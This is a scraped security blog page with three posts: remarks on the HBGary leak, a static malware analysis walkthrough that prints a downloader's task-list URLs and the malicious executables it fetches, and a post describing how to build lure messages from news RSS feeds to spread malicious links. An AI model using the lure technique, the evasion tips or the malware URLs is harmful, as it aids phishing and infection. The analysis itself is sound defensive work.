No doubt you have heard about Anonymous hacking HBGary and leaking their emails.
The media had a field day: "security company gets hacked", "Black ops: how HBGary wrote backdoors for the government" etc, etc....
HBGary got pwned, but shit happens right? its probably not worth thinking about all the successful hacks which happen against companies such as Micro$oft and Google which are not made public... and whats with the big fuss about writing backdoors for the government??? We are in the age of cyberwar, I bet plenty of defense & security companies are doing the same? (Stuxnet anybody?)
Anyway, to the point of this post:
One of the BIG things I am surprised has not been reported on more, are all the email reports and investigations on APT? A number of the emails are regarding in depth APT investigations, there are also emails about specific APT/Malware variants and how the HBGary tools detect them.
No doubt the APT 'attackers' have read the HBG emails and have probably dramatically changed tactics, and likely have moved to entirely new malware variants. There was one specific HBG customer who I will refer as 'QQ' who appears to have had an on going APT infected for a long time. Reading the emails it would appear a lot of data was stolen (how much that data relates to in real money, I don't know, potentially in the millions?), and now their entire investigation has been published on the Internet, its going to cost them millions more in remediation, let alone the negative image its may have to its customers.
Fortunately none of the HBG apps source code was leaked, if it did, AV companies would be in for a hard time as I believe this would give APT authors an great advantage in staying undetected.
D3ADLiN3
Showing posts with label Malware. Show all posts
Showing posts with label Malware. Show all posts
Monday, 21 February 2011
Friday, 14 May 2010
Offline Malware Analysis
In this article I am going to write about analysing static/offline Malware (without actually running and debugging it).
From looking at strings in Malware it is quite often easy to work out what its designed todo.
To find some live Malware samples, I am going to use some known driveby download sites. This will dump a list of URLs to a file:
Now I use WGet to access the pages safely. I spoof the UserAgent so I don't get blacklisted by download kits, and by using a IE6 UserAgent hopefully I will trigger more attacks.
Once WGet has finished downloading, there are a variety of HTML pages and executable left over.
So I have picked a random executable downloaded called 1009.exe.
Now lets take a look at the file:
OK so AV has detected the file as a Anti Virus Killer, and it appears to be unpacked and written in Delphi.
Opening the file in hexeditor, I can confirm the file is not Crypted or Packed because all there strings within the file are clearly visible and not obfuscated in anyway.
So lets dump the all the strings out of the file:
Now couple of things jump out straight away: Av Love Av Av Av Av Av, bluedragonfly, U_GuiHack360, KillAv, upmyself.
A quick Google on some of these come up with some obvious results:
"U_GuiHack360" appears to be a method to kill Norton 360 AV/Firewall GUI.
"Av Love Av Av Av Av Av" links to a website about Malware.
There is list of different AV executables, most probably for process killing.
There are references to Registry Keys:
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
These keys are related to display options for Hidden files in Windows Explorer.
We also find references to what appear to be the startup methods:
Software\Microsoft\Windows\CurrentVersion\policies
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\runonce
software\microsoft\windows\currentversion\runonceex
software\microsoft\windows\currentversion\runservices
The Malware author also seems to be using "Image File Execution Options" Debugger method to kill AV (or possibly as a startup method?):
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
This lesser known registry key is designed to Debug applications by first launching a Debugger which in turns launches the application to be debugged.
So for example, if you wanted to debug notepad.exe with OllyDbg you would make an entry like so:
This would launch Ollydbg which would then load notepad.exe
If you use a debugger/process which does not redirect it will load the debugger instead of the process. So for example if you changed the Ollydbg to calc.exe instead, each time you tried to load notepad.exe it would launch calc.exe.
This can be used by Malware in 2 ways:
1) Hijacking an existing process which is set to startup (eg: default builtin windows service (eg: Windows Update)) and use this as a startup method.
2) Hijack a legitimate process and set it to load something useless instead. For example, the Malware could add each Anti Virus process to the list and set something like svchost.exe to load instead. This would stop the AV process from loading and instead load svchost.exe which would do nothing.
We also find a reference to "SeDebugPrivilege" which could be used to help killing AV Processes or for Process Injection.
There are references to the following strings: FireWall, Virus, Anti, NOD32, Sniffer, DeBug.
I would suggest this is most probably used as a generic 'Anti-Anti', searching and closing Windows which contains the strings in there window title.
We can also see what I believe are the Delphi Modules used in the file: bluedragonfly, U_GuiHack360, 3Messages, KWindows, UTypes, SysInit, System, KillAv, SysUtils, ImageHlp, SysConst, process, GetIp, ?WinInet, WinSock, HardwareInfo, 0Nb30, anti, upmyself, Jencrypt, @other, TlHelp32.
There are also some URLs in the file:
Going back into the Hexeditor, I search for the xxx.cn and find some other interesting strings next to it: "?mac=" and "&ver=Test&os=Windows". To me, this looks like some sort of tracking system, probably to count the number of infections.
Looking at the next URL in the file, I downloaded the haozi.txt and opened it up:
This appears to be a "Task List" for an Intelligent Downloader. Whats the difference between a Intelligent Downloader and Regular Downloader? A Regular Downloader normally has a URL hardcoded, a Intelligent Downloader will goto a URL to find a task of things to download (in this case 5 other binaries). The benefit of using a Intelligent Downloader is the Malware author can change the location of his Malware files, and his Downloader will keep functioning a lot longer than a Regular Downloader (assuming the Task List URL doesn't die).
So lets download and scan the files:
We can see one of the files is packed with UPX, we can unpack this file and analyse the original file:
(Im not going to reverse these files today).
So without even running and debugging the file, we can see a number of features of this Downloader, and the further Malware its configured to Download.
What did the Malware author do wrong?
The Malware author made no attempt at Crypting, Packing or Obfuscating the Downloader or its settings. To make things more difficult the Malware author should have encrypted the Reg Keys, Process Names, URLs, obfuscated Module Names, encrypted the config file, and Crypted and/or Packed the actual Executable.
From looking at strings in Malware it is quite often easy to work out what its designed todo.
To find some live Malware samples, I am going to use some known driveby download sites. This will dump a list of URLs to a file:
D3ADLiN3@box:~# links2 -dump http://www.malwareurl.com/search.php?domain=\&s=exploits\&match=0\&rp=100\&urls=on\&redirs=on\&ip=on\&reverse=on\&as=on | awk '{print $1}' | sed 's/|//' | egrep "[A-Za-z0-9\/]" | awk '{print "http://"$1}' >> MalURLS.txtNow I use WGet to access the pages safely. I spoof the UserAgent so I don't get blacklisted by download kits, and by using a IE6 UserAgent hopefully I will trigger more attacks.
D3ADLiN3@box:~# wget -i MalURLS.txt -T 1 -t 3 --user-agent="Mozilla/4.0 (MSIE 6.0; Windows NT 5.1)"
Once WGet has finished downloading, there are a variety of HTML pages and executable left over.
So I have picked a random executable downloaded called 1009.exe.
Now lets take a look at the file:
D3ADLiN3@box:~# packer.py 1009.exe -> Nothing Found D3ADLiN3@box:~# yara rules 1009.exe -> Delphi D3ADLiN3@box:~# clamscan 1009.exe 1009.exe: Trojan.Killav-157 FOUND
OK so AV has detected the file as a Anti Virus Killer, and it appears to be unpacked and written in Delphi.
Opening the file in hexeditor, I can confirm the file is not Crypted or Packed because all there strings within the file are clearly visible and not obfuscated in anyway.
So lets dump the all the strings out of the file:
D3ADLiN3@box:~# strings 1009.exe > strings_1009.exe
Now couple of things jump out straight away: Av Love Av Av Av Av Av, bluedragonfly, U_GuiHack360, KillAv, upmyself.
A quick Google on some of these come up with some obvious results:
"U_GuiHack360" appears to be a method to kill Norton 360 AV/Firewall GUI.
"Av Love Av Av Av Av Av" links to a website about Malware.
There is list of different AV executables, most probably for process killing.
There are references to Registry Keys:
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
These keys are related to display options for Hidden files in Windows Explorer.
We also find references to what appear to be the startup methods:
Software\Microsoft\Windows\CurrentVersion\policies
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\runonce
software\microsoft\windows\currentversion\runonceex
software\microsoft\windows\currentversion\runservices
The Malware author also seems to be using "Image File Execution Options" Debugger method to kill AV (or possibly as a startup method?):
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
This lesser known registry key is designed to Debug applications by first launching a Debugger which in turns launches the application to be debugged.
So for example, if you wanted to debug notepad.exe with OllyDbg you would make an entry like so:
This would launch Ollydbg which would then load notepad.exe
If you use a debugger/process which does not redirect it will load the debugger instead of the process. So for example if you changed the Ollydbg to calc.exe instead, each time you tried to load notepad.exe it would launch calc.exe.
This can be used by Malware in 2 ways:
1) Hijacking an existing process which is set to startup (eg: default builtin windows service (eg: Windows Update)) and use this as a startup method.
2) Hijack a legitimate process and set it to load something useless instead. For example, the Malware could add each Anti Virus process to the list and set something like svchost.exe to load instead. This would stop the AV process from loading and instead load svchost.exe which would do nothing.
We also find a reference to "SeDebugPrivilege" which could be used to help killing AV Processes or for Process Injection.
There are references to the following strings: FireWall, Virus, Anti, NOD32, Sniffer, DeBug.
I would suggest this is most probably used as a generic 'Anti-Anti', searching and closing Windows which contains the strings in there window title.
We can also see what I believe are the Delphi Modules used in the file: bluedragonfly, U_GuiHack360, 3Messages, KWindows, UTypes, SysInit, System, KillAv, SysUtils, ImageHlp, SysConst, process, GetIp, ?WinInet, WinSock, HardwareInfo, 0Nb30, anti, upmyself, Jencrypt, @other, TlHelp32.
There are also some URLs in the file:
http://www.xxx.cn/Count.asp http://121.11.81.46:88/haozi.txt
Going back into the Hexeditor, I search for the xxx.cn and find some other interesting strings next to it: "?mac=" and "&ver=Test&os=Windows". To me, this looks like some sort of tracking system, probably to count the number of infections.
Looking at the next URL in the file, I downloaded the haozi.txt and opened it up:
http://121.11.81.46:88/1005.exe 105.exe http://121.11.81.46:88/han.exe han.exe http://121.11.81.46:88/dog1.exe dog1.exe http://121.11.81.46:88/dog2.exe dog2.exe http://121.11.81.46:88/dogarp.exe
This appears to be a "Task List" for an Intelligent Downloader. Whats the difference between a Intelligent Downloader and Regular Downloader? A Regular Downloader normally has a URL hardcoded, a Intelligent Downloader will goto a URL to find a task of things to download (in this case 5 other binaries). The benefit of using a Intelligent Downloader is the Malware author can change the location of his Malware files, and his Downloader will keep functioning a lot longer than a Regular Downloader (assuming the Task List URL doesn't die).
So lets download and scan the files:
D3ADLiN3@box:~# clamscan *.exe 1005.exe: OK dog1.exe: OK dog2.exe: Trojan.Downloader-13207 FOUND dogarp.exe: Trojan.Agent-16390 FOUND han.exe: OK D3ADLiN3@box:~# packer.py 1005.exe -> Nothing Found D3ADLiN3@box:~# packer.py dog1.exe -> ['UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser'] D3ADLiN3@box:~# packer.py dog2.exe -> ['TASM / MASM'] D3ADLiN3@box:~# packer.py dogarp.exe -> Nothing Found D3ADLiN3@box:~# packer.py han.exe -> ['Microsoft Visual C++'] D3ADLiN3@box:~# yara rules 1005.exe -> Armadillo D3ADLiN3@box:~# yara rules dog1.exe -> UPX D3ADLiN3@box:~# yara rules dog2.exe -> Nothing Found D3ADLiN3@box:~# yara rules dogarp.exe -> DecodedIframe D3ADLiN3@box:~# yara rules han.exe -> Armadillo
We can see one of the files is packed with UPX, we can unpack this file and analyse the original file:
D3ADLiN3@box:~# upx -d dog1.exe -o dog1_unpacked.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2010 UPX 3.05 Markus Oberhumer, Laszlo Molnar & John Reiser Apr 27th 2010 File size Ratio Format Name -------------------- ------ ----------- ----------- 23552 -> 11264 47.83% win32/pe dog1_unpacked.exe Unpacked 1 file. D3ADLiN3@box:~# packer.py dog1_unpacked.exe -> Nothing Found D3ADLiN3@box:~# yara rules dog1_unpacked.exe -> Nothing Found D3ADLiN3@box:~# clamscan dog1_unpacked.exe dog1_unpacked.exe: OK
(Im not going to reverse these files today).
So without even running and debugging the file, we can see a number of features of this Downloader, and the further Malware its configured to Download.
What did the Malware author do wrong?
The Malware author made no attempt at Crypting, Packing or Obfuscating the Downloader or its settings. To make things more difficult the Malware author should have encrypted the Reg Keys, Process Names, URLs, obfuscated Module Names, encrypted the config file, and Crypted and/or Packed the actual Executable.
Friday, 1 May 2009
Dynamic Social Engineering Spreading
So what is 'Dynamic Social Engineering Spreading'?
Its simply using social engineering techniques but with dynamic content: The main use of this would be spreading via Email or IM etc.
So how do we get our dynamic content? simple: RSS Feeds.
This is also where our social engineering techniques come into play:
We use popular RSS Feeds on topics such as the News, Sports, etc.
Lets take the BBC: The BBC has a RSS Feed which is updated regularly with new content which gives us constant fresh data to work with. The fact it is stored in XML means it makes it very easy to parse the content and manipulate it to our needs.
Using the News gives us the Social Engineering edge. The victim is more likely to accept something which they have read/heard about on TV, News Paper etc.
IM Example:
Template:
Hey you heard about *NEWS SUBJECT* ?
*NEWS CONTENT*
Look at this *LINK/ZIP*
With Real Data (Taken from BBC News RSS Feed):
Hey you heard about Venezuela army helicopter crashes ?
A military helicopter has crashed in Venezuela killing at least 18 people on board, President Hugo Chavez says.
Look at this http://www.badguy.com/evilwebpage.htm
Its simply using social engineering techniques but with dynamic content: The main use of this would be spreading via Email or IM etc.
So how do we get our dynamic content? simple: RSS Feeds.
This is also where our social engineering techniques come into play:
We use popular RSS Feeds on topics such as the News, Sports, etc.
Lets take the BBC: The BBC has a RSS Feed which is updated regularly with new content which gives us constant fresh data to work with. The fact it is stored in XML means it makes it very easy to parse the content and manipulate it to our needs.
Using the News gives us the Social Engineering edge. The victim is more likely to accept something which they have read/heard about on TV, News Paper etc.
IM Example:
Template:
Hey you heard about *NEWS SUBJECT* ?
*NEWS CONTENT*
Look at this *LINK/ZIP*
With Real Data (Taken from BBC News RSS Feed):
Hey you heard about Venezuela army helicopter crashes ?
A military helicopter has crashed in Venezuela killing at least 18 people on board, President Hugo Chavez says.
Look at this http://www.badguy.com/evilwebpage.htm
Subscribe to:
Posts (Atom)
